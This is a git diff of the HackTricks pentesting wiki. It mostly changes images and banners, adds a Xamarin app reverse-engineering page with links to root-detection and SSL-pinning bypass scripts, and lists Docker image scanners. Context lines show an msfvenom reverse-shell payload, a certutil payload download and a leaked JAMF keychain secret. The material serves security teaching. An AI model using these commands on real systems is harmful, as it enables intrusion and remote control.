diff --git a/.gitbook/assets/image (1) (3) (1) (1) (1).png b/.gitbook/assets/image (1) (3) (1) (1) (1).png
new file mode 100644
index 000000000..4f2d7d140
Binary files /dev/null and b/.gitbook/assets/image (1) (3) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (3) (1) (1).png b/.gitbook/assets/image (1) (3) (1) (1).png
index 4f2d7d140..248451f19 100644
Binary files a/.gitbook/assets/image (1) (3) (1) (1).png and b/.gitbook/assets/image (1) (3) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (3) (1).png b/.gitbook/assets/image (1) (3) (1).png
index 248451f19..7ebaebfa3 100644
Binary files a/.gitbook/assets/image (1) (3) (1).png and b/.gitbook/assets/image (1) (3) (1).png differ
diff --git a/.gitbook/assets/image (1) (3).png b/.gitbook/assets/image (1) (3).png
index 7ebaebfa3..8eae14f0f 100644
Binary files a/.gitbook/assets/image (1) (3).png and b/.gitbook/assets/image (1) (3).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index 8eae14f0f..53e9f7c1f 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (2) (1).png b/.gitbook/assets/image (2) (1) (2) (1).png
new file mode 100644
index 000000000..0f8a86733
Binary files /dev/null and b/.gitbook/assets/image (2) (1) (2) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (2).png b/.gitbook/assets/image (2) (1) (2).png
index 0f8a86733..4bb5f2707 100644
Binary files a/.gitbook/assets/image (2) (1) (2).png and b/.gitbook/assets/image (2) (1) (2).png differ
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png
index 4bb5f2707..4ede9266b 100644
Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index 4ede9266b..d7789e602 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (3) (8).png b/.gitbook/assets/image (3) (8).png
new file mode 100644
index 000000000..0ef3cc20b
Binary files /dev/null and b/.gitbook/assets/image (3) (8).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index 0ef3cc20b..7dcdeb084 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (4) (3) (2).png b/.gitbook/assets/image (4) (3) (2).png
new file mode 100644
index 000000000..1ad2a58a1
Binary files /dev/null and b/.gitbook/assets/image (4) (3) (2).png differ
diff --git a/.gitbook/assets/image (4) (3).png b/.gitbook/assets/image (4) (3).png
index 1ad2a58a1..20ead5c09 100644
Binary files a/.gitbook/assets/image (4) (3).png and b/.gitbook/assets/image (4) (3).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index 20ead5c09..ea50c990a 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index ea50c990a..865dc4ae4 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/README.md b/README.md
index 6e9eea4fc..94d2a7dfd 100644
--- a/README.md
+++ b/README.md
@@ -59,7 +59,7 @@ Get Access Today:
### [HACKENPROOF](https://bit.ly/3xrrDrL)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/SUMMARY.md b/SUMMARY.md
index a126a8626..c423295a5 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -321,6 +321,7 @@
* [iOS UIPasteboard](mobile-pentesting/ios-pentesting/ios-uipasteboard.md)
* [iOS WebViews](mobile-pentesting/ios-pentesting/ios-webviews.md)
* [Cordova Apps](mobile-pentesting/cordova-apps.md)
+* [Xamarin Apps](mobile-pentesting/xamarin-apps.md)
## π½ Network Services Pentesting
diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md
index e80f05450..1d348d7eb 100644
--- a/generic-methodologies-and-resources/pentesting-wifi/README.md
+++ b/generic-methodologies-and-resources/pentesting-wifi/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -307,7 +307,7 @@ So broken and disappeared that I am not going to talk about it. Just know that _
.png>)
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -822,7 +822,7 @@ This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group o
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md
index 8f38d9ca3..947253094 100644
--- a/generic-methodologies-and-resources/shells/msfvenom.md
+++ b/generic-methodologies-and-resources/shells/msfvenom.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -194,7 +194,7 @@ msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
```
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md
index cb466659e..c8f88f0bf 100644
--- a/generic-methodologies-and-resources/shells/windows.md
+++ b/generic-methodologies-and-resources/shells/windows.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -329,7 +329,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
**Detected by defender**
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -590,7 +590,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md
index 26f957711..0b52f624f 100644
--- a/linux-hardening/linux-privilege-escalation-checklist.md
+++ b/linux-hardening/linux-privilege-escalation-checklist.md
@@ -14,7 +14,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -169,7 +169,7 @@ Gain reputation points with each verified bug and conquer the top of the weekly
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md
index 6d4ee6d68..d1393702f 100644
--- a/linux-hardening/privilege-escalation/docker-security/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/README.md
@@ -15,7 +15,7 @@ Get Access Today:
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -57,9 +57,9 @@ Containers can have **security vulnerabilities** either because of the base imag
For more [**information read this**](https://docs.docker.com/engine/scan/).
-#### How to scan images
+* **`docker scan`**
-The `docker scan` command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image:
+The **`docker scan`** command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image:
```bash
docker scan hello-world
@@ -77,6 +77,18 @@ Licenses: enabled
Note that we do not currently have vulnerability data for your image.
```
+* [**`trivy`**](https://github.com/aquasecurity/trivy)
+
+```bash
+trivy -q -f json :
+```
+
+* [**`clair-scanner`**](https://github.com/arminc/clair-scanner)
+
+```bash
+clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5
+```
+
### Docker Image Signing
Docker Container images can be stored either in public or private registry. It is needed to **sign** **Container** images to be able to confirm images haven't being tampered. Content **publisher** takes care of **signing** Container image and pushing it into the registry.\
@@ -117,6 +129,8 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
When I changed Docker host, I had to move the root keys and repository keys to operate from the new host.
+***
+
 (1) (2).png>)
\
@@ -131,18 +145,18 @@ Get Access Today:
Summary of Container Security Features
-#### Namespaces
+**Namespaces**
Namespaces are useful to isolate a project from the other ones, isolating process communications, network, mounts... It's useful to isolate the docker process from other processes (and even the /proc folder) so it cannot escape abusing other processes.
It could be possible "escape" or more exactly **create new namespaces** using the binary **`unshare`** (that uses the **`unshare`** syscall). Docker by default prevents it, but kubernetes doesn't (at the time of this writtiing).\
Ayway, this is helpful to create new namespaces, but **not to get back to the host defaults namespaces** (unless you have access to some `/proc` inside the host namespaces, where you could use **`nsenter`** to enter in the host namespaces.).
-#### CGroups
+**CGroups**
This allows to limit resources and doesn't affect the security of the isolation of the process (except for the `release_agent` that could be used to escape).
-#### Capabilities Drop
+**Capabilities Drop**
I find this to be one of the **most important** features regarding the process isolation security. This is because without the capabilities, even if the process is running as root **you won't be able to do some privileged actions** (because the called **`syscall`** will return permission error because the process doesn't have the needed capabilities).
@@ -154,12 +168,12 @@ Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,ca
```
{% endcode %}
-#### Seccomp
+**Seccomp**
It's enabled by default in Docker. It helps to **limit even more the syscalls** that the process can call.\
The **default Docker Seccomp profile** can be found in [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json)
-#### AppArmor
+**AppArmor**
Docker has a template that you can activate: [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
@@ -293,14 +307,6 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv
For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)
- (1) (2).png>)
-
-\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
## Other Security Considerations
### Managing Secrets
@@ -334,7 +340,7 @@ If you need your **secret in your running container**, and not just when buildin
With Docker Compose, add the secrets key-value pair to a service and specify the secret file. Hat tip to [Stack Exchange answer](https://serverfault.com/a/936262/535325) for the Docker Compose secrets tip that the example below is adapted from.
-Example docker-compose.yml with secrets:
+Example `docker-compose.yml` with secrets:
```yaml
version: "3.7"
@@ -425,7 +431,7 @@ If you have access to the docker socket or have access to a user in the **docker
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index a48f93d25..d665ae95e 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -53,7 +53,7 @@ Moreover, after finding proper credentials you could be able to brute-force othe
#### JAMF device Authentication
-
+
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md
index c20d8eb74..89c9a64f5 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -174,7 +174,7 @@ First of all, please note that **most of the tricks about privilege escalation a
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index 8b5883a37..db491a49e 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -16,7 +16,7 @@
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
-
+
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
@@ -56,7 +56,7 @@ The events that the Endpoint Security framework can monitor are categorized into
### Endpoint Security Framework Architecture
-
+
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
index fcaefa6f2..8c4154561 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
@@ -189,7 +189,7 @@ Then in order to trigger the execution it would be needed to know some place whe
In x64 versions this is straightforward using the mimikatz-esque **signature hunting** technique to search through **`libcorclr.dll`** for a reference to the symbol **`_hlpDynamicFuncTable`**, which we can dereference:
-
+
All that is left to do is to find an address from which to start our signature search. To do this, we leverage another exposed debugger function, **`MT_GetDCB`**. This returns a number of useful bits of information on the target process, but for our case, we are interested in a field returned containing the **address of a helper function**, **`m_helperRemoteStartAddr`**. Using this address, we know just **where `libcorclr.dll` is located** within the target process memory and we can start our search for the DFT.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
index 5ec636d80..3e89d2445 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
@@ -14,7 +14,7 @@
## Sandbox loading process
-
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
index ee0c39981..7c623dec4 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses.md
@@ -393,7 +393,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
-
+
## Reference
diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md
index ed9d5b61e..c9f9fc770 100644
--- a/mobile-pentesting/android-app-pentesting/README.md
+++ b/mobile-pentesting/android-app-pentesting/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -65,7 +65,7 @@ package:/data/app/com.android.insecurebankv2-Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
```
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -218,19 +218,11 @@ Read the following page to learn how to easily access javascript code of React a
### Xamarin Applications
-**Xamarin** apps are written in **C#**, in order to access the C# code **decompressed,** you need to get the files from the **apk**:
+Read the following page to learn how to easily access C# code of a xamarin applications:
-```bash
-7z r app.apk #Or any other zip decompression cmd
-```
-
-Then, decompress all the DLsL using [**xamarin-decompress**](https://github.com/NickstaDB/xamarin-decompress)**:**
-
-```
-python3 xamarin-decompress.py -o /path/to/decompressed/apk
-```
-
-and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
+{% content-ref url="../xamarin-apps.md" %}
+[xamarin-apps.md](../xamarin-apps.md)
+{% endcontent-ref %}
### Superpacked Applications
@@ -265,7 +257,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
[content-protocol.md](content-protocol.md)
{% endcontent-ref %}
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -522,7 +514,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -738,7 +730,7 @@ It is able to:
Useful to detect malware: [https://koodous.com/](https://koodous.com)
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -826,7 +818,7 @@ For more information visit:
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
index 3751c82db..6f965060b 100644
--- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md
+++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -136,7 +136,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term βSmaliβ to refer to instructions. If youβve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -470,7 +470,7 @@ MDM or Mobile Device Management are software suits that are used to **ensure a c
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/mobile-pentesting/xamarin-apps.md b/mobile-pentesting/xamarin-apps.md
new file mode 100644
index 000000000..ae05e1a62
--- /dev/null
+++ b/mobile-pentesting/xamarin-apps.md
@@ -0,0 +1,119 @@
+# Xamarin Apps
+
+
+
+βοΈ HackTricks Cloud βοΈ -π¦ Twitter π¦ - ποΈ Twitch ποΈ - π₯ Youtube π₯
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
+
+## **Basic Information**
+
+Xamarin is an open-source platform that gives developers access to a comprehensive selection of tools and add-ons, allowing them to **create modern apps for iOS, Android, and Windows using .NET and C#** frameworks.
+
+### Xamarin Android Architecture
+
+
+
+Xamarin offers .NET bindings to Android.\* and Java.\* namespaces. Xamarin.
+
+Android applications operate under the Mono execution environment, with the Android Runtime (ART) virtual machine running side by side.
+
+The Mono execution environment calls into these namespaces through Managed Callable Wrappers (MCW) and gives Android Callable Wrappers (ACW) to the ART.
+
+Both these environments run on top of the Linux kernel and invoke various APIs to the user code. The arrangement allows developers to access the underlying system.
+
+### Xamarin iOS Project
+
+Xamarin.iOS applications run under the Mono runtime environment and use full Ahead of Time (AOT) compilation to compile C# .NET codes to ARM assembly language.
+
+It runs along with the Objective-C Runtime. The runtime environments run on top of a UNIX-like kernel and invoke several APIs to the user code, which lets the developers access the underlying managed or native system.
+
+The below-given diagram depicts this architecture:
+
+
+
+### What is .Net Runtime and Mono Framework?
+
+**.Net framework is a set of assemblies, classes, and namespaces** that developers can use to create applications; .Net Runtime runs the compiled code, and the process is called managed code execution. .NET Runtime provides several features that ensure platform independence and are compatible with older framework versions.
+
+**Mono Framework** was started in 2005 as an implementation of the .NET Framework for Linux (Ximian/SuSe/Novell). Sponsored by Microsoft and led by Xamarin, Mono is the .NET framework's open-source implementation based on the ECMA standards for Common Language Runtime and C#.
+
+
+
+## Reverse Engineering Techniques for Xamarin Apps
+
+### Decompilation of Xamarin Assemblies
+
+Decompilation is the process used to produce source code from compiled code. To procure information about the assemblies and executables currently in memory, Windows is a great place.
+
+To open the Modules window, select Debug > Windows > Modules. Once you detect the module that requires decompilation, right-click and select "Decompile Source to Symbol File". This action **builds a symbol file that contains a decompiled source which**, in turn, lets you enter into 3rd party code directly from your source code.
+
+**Visual Studio** decompiles the managed code, even in the absence of symbols, allowing you to look at the code, inspect the variables and set breakpoints. To extract source code to disk, right-click on the module with embedded source and click "Extract Embedded Source ."This will export the source files to a Miscellaneous files folder for further analysis.
+
+### JIT vs AOT Compilation of Xamarin Applications
+
+These two options to compile C# based Xamarin code into an application, i.e, **Just in time compilation and ahead of time compilation**. The way of compilation affects how the application code is shipped within the apk or the ipa file. Let us quickly take a look at it below:
+
+\- **Android**: Xamarin allows you to compile using **both the JIT and the AOT flags for android**. There is also a way to go in between to get the most speed of execution using the Hybrid AOT mode. Note that the Full AOT mode is available only for the Enterprise license.
+
+\- **iOS**: There is only one option in the case of iOS, **ahead-of-time compilation**. This is due to Apple's policies which prohibit the execution of dynamically generated code on a device.
+
+{% hint style="info" %}
+If you encounter a Full AOT compiled application, and if the IL Assembly files are removed to reduce the build size by the developer, then the reversing requires an extra step of extracting dll files from .dll.so files from the lib folder or from the `libmonodroid_bundle_app.so` file. If it is a Hybrid AOT compiled app, and the IL files are still kept in the app bundle, we can use that to reverse engineer the application.
+{% endhint %}
+
+## Getting the dll files from the APK/IPA
+
+Just **unzip the apk/ipa** file and copy all the files present under the assemblies directory:
+
+
+
+In case of Android **APKs these dll files are compressed** and cannot be directly used for decompilation. Luckily there are tools out there that we can use to **uncompress these dll files** like [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) and [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress).
+
+```
+python3 xamarin-decompress.py -o /path/to/decompressed/apk
+```
+
+In the case of the iOS, **dll files inside the IPA files can be directly loaded** into a decompiler (no need to uncompress anything).
+
+**Most of the application code can be found when we decompile the dll files.** Also note that Xamarin Framework based apps contain 90% of common code in the builds of all platforms like iOS and Android etc.
+
+
+
+From the above screenshot of listing the dll files that were present in the apk, we can confirm that it is a Xamarin app. It contains app-specific dll files along with the library files that are required for the app to run, such as `Xamarin.Essentails.dll` or `Mono.Security.dll` .
+
+{% hint style="success" %}
+Finally you can use [**these recommended tools**](../reversing/reversing-tools-basic-methods/#net-decompiler) to access the **C# code** from the DLLs.
+{% endhint %}
+
+## Dynamic Analysis
+
+Try to check if the application has any kind of SSL pinning in place. If not, using Burp as a system, CA should work for intercepting requests. **Frida with Java or ObjC runtime wonβt work** here, but luckily thereβs a tool out there that can be used for hooking into methods.
+
+[**Fridax**](https://github.com/NorthwaveSecurity/fridax) allows you to easily **modify the .NET binary inside a Xamarin application on runtime**. Static analysis will help you identify different methods present within the application, which can be hooked later for dynamic analysis using Fridax. Below are a few Frida scripts that can help us bypass root detection or SSL-pinning:
+
+* [**xamarin-antiroot**](https://codeshare.frida.re/@Gand3lf/xamarin-antiroot/)
+* [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
+* [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
+
+## References
+
+* [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
+
+
+
+βοΈ HackTricks Cloud βοΈ -π¦ Twitter π¦ - ποΈ Twitch ποΈ - π₯ Youtube π₯
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md
index c8d47ace4..74fe054ec 100644
--- a/network-services-pentesting/135-pentesting-msrpc.md
+++ b/network-services-pentesting/135-pentesting-msrpc.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -112,7 +112,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md
index c73b6fc8b..2bf2de377 100644
--- a/network-services-pentesting/27017-27018-mongodb.md
+++ b/network-services-pentesting/27017-27018-mongodb.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -129,7 +129,7 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu
If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md
